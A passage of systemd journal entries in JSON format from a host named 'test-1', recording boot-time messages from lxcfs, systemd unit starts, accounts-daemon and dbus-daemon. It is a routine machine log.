"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f2;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=dd9f84cd45211f80", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 2: fd: 8: hugetlb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f3;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=c60b3b8e02b0ff6e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 3: fd: 9: freezer" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f4;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=e0b682b06fac3a58", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 4: fd: 10: memory" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f5;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=7fef776a74e9508e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 5: fd: 11: cpu,cpuacct" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f6;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=20ea5d2e14d8f9bf", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 6: fd: 12: devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f7;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=adb7445415f5f078", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 7: fd: 13: net_cls,net_prio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f8;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=be4fe76ac79fe950", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 8: fd: 14: blkio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f9;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=b6e830dc214e9808", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 9: fd: 15: rdma" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fa;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=54723fbc28f831a1", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 10: fd: 16: cpuset" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fb;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=4088854d132749ea", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 11: fd: 17: name=systemd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fc;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=47878a04061de12c", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 12: fd: 18: unified" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fd;b=e2b08827b5804427b422c10c84f1567e;m=2a60c68;t=5bd16df698bcf;x=1cb1f21d0102939d", "__REALTIME_TIMESTAMP" : "1615280818719695", "__MONOTONIC_TIMESTAMP" : "44436584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - unix socket.", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817978451" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fe;b=e2b08827b5804427b422c10c84f1567e;m=2a60cc8;t=5bd16df698c2f;x=fdfd154cd83f54ad", "__REALTIME_TIMESTAMP" : "1615280818719791", "__MONOTONIC_TIMESTAMP" : "44436680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "accounts-daemon", "SYSLOG_PID" : "786", "MESSAGE" : "started daemon version 0.6.45", "_PID" : "786", "_COMM" : "accounts-daemon", "_EXE" : "/usr/lib/accountsservice/accounts-daemon", "_CMDLINE" : "/usr/lib/accountsservice/accounts-daemon", "_SYSTEMD_CGROUP" : "/system.slice/accounts-daemon.service", "_SYSTEMD_UNIT" : "accounts-daemon.service", "_SYSTEMD_INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818556640" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ff;b=e2b08827b5804427b422c10c84f1567e;m=2a60eb8;t=5bd16df698e1f;x=4332bec02ad001a9", "__REALTIME_TIMESTAMP" : "1615280818720287", "__MONOTONIC_TIMESTAMP" : "44437176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily Cleanup of Temporary Directories.", "UNIT" : "systemd-tmpfiles-clean.timer", "INVOCATION_ID" : "9700b3e9c7e94c8bbb5cb5eadd31c9ac", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817983403" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=300;b=e2b08827b5804427b422c10c84f1567e;m=2a60f56;t=5bd16df698ebe;x=2a7e2d8853f693cb", "__REALTIME_TIMESTAMP" : "1615280818720446", "__MONOTONIC_TIMESTAMP" : "44437334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.hostname1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634485" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=301;b=e2b08827b5804427b422c10c84f1567e;m=2a610a1;t=5bd16df699009;x=34d30000e7628ab", "__REALTIME_TIMESTAMP" : "1615280818720777", "__MONOTONIC_TIMESTAMP" : "44437665", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on Open-iSCSI iscsid Socket.", "UNIT" : "iscsid.socket", "INVOCATION_ID" : "1eb0ced481574b02b745ff2eadecc1bc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817988812" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=302;b=e2b08827b5804427b422c10c84f1567e;m=2a6146e;t=5bd16df6993d5;x=9f850fb4e837414a", "__REALTIME_TIMESTAMP" : "1615280818721749", "__MONOTONIC_TIMESTAMP" : "44438638", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Discard unused blocks once a week.", "UNIT" : "fstrim.timer", "INVOCATION_ID" : "1d95b26b3cca4090b62056f0aa0ddd31", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817995335" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=303;b=e2b08827b5804427b422c10c84f1567e;m=2a61590;t=5bd16df6994f8;x=ea068fc4350924ac", "__REALTIME_TIMESTAMP" : "1615280818722040", "__MONOTONIC_TIMESTAMP" : "44438928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Timers.", "UNIT" : "timers.target", "INVOCATION_ID" : "ccb21092f05e4b53901c1b69f443bc17", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818001033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=304;b=e2b08827b5804427b422c10c84f1567e;m=2a6193f;t=5bd16df6998a6;x=1e56ba1aa417b00e", "__REALTIME_TIMESTAMP" : "1615280818722982", "__MONOTONIC_TIMESTAMP" : "44439871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started ACPI Events Check.", "UNIT" : "acpid.path", "INVOCATION_ID" : "acbb7e4d2bbf44f59c42342ed64de95e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818006228" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=305;b=e2b08827b5804427b422c10c84f1567e;m=2a61f82;t=5bd16df699ee9;x=263882fa93cf9e82", "__REALTIME_TIMESTAMP" : "1615280818724585", "__MONOTONIC_TIMESTAMP" : "44441474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "UNIT" : "paths.target", "INVOCATION_ID" : "611ff12fe3034976a9758296c68836c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818008176" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=306;b=e2b08827b5804427b422c10c84f1567e;m=2a620bf;t=5bd16df69a026;x=112078bc5e9c2d29", "__REALTIME_TIMESTAMP" : "1615280818724902", "__MONOTONIC_TIMESTAMP" : "44441791", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on ACPID Listen Socket.", "UNIT" : "acpid.socket", "INVOCATION_ID" : "d144781f5fc04753bab3d0ab003bc3b1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818010071" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=307;b=e2b08827b5804427b422c10c84f1567e;m=2a621ea;t=5bd16df69a151;x=2c6f3fd245ed1a90", "__REALTIME_TIMESTAMP" : "1615280818725201", "__MONOTONIC_TIMESTAMP" : "44442090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "MESSAGE" : "Started Availability of block devices.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818018341" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=308;b=e2b08827b5804427b422c10c84f1567e;m=2a6234f;t=5bd16df69a2b7;x=12dd4932c964faba", "__REALTIME_TIMESTAMP" : "1615280818725559", "__MONOTONIC_TIMESTAMP" : "44442447", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", 